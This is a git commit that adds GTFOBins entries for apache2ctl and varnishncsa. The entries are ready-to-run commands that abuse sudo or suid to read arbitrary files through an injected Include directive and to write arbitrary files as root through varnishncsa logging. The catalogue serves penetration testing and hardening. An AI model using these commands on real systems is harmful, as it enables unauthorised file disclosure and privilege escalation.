Add varnishncsa and apache2ctl

2024-10-22 16:48:09 +02:00 · 2023-12-23 12:44:37 +01:00 · 2023-12-23 12:44:37 +01:00 · e986b31e59
commit e986b31e59
parent 6696d463cd 914c850cec
2 changed files with 29 additions and 0 deletions
--- a/_gtfobins/apache2ctl.md
+++ b/_gtfobins/apache2ctl.md
@ -0,0 +1,12 @@
+---
+description: This includes the file in the actual configuration file, the first line is leaked as an error message.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        apache2ctl -c "Include $LFILE" -k stop
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo apache2ctl -c "Include $LFILE" -k stop
+---
--- a/_gtfobins/varnishncsa.md
+++ b/_gtfobins/varnishncsa.md
@ -0,0 +1,17 @@
+---
+description: |
+  This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
+
+  ```
+  curl -H 'yyy: DATA' http://localhost:6081/xxx
+  ```
+functions:
+  sudo:
+    - code: |
+        LFILE=file_to_write
+        sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+  suid:
+    - code: |
+        LFILE=file_to_write
+        ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+---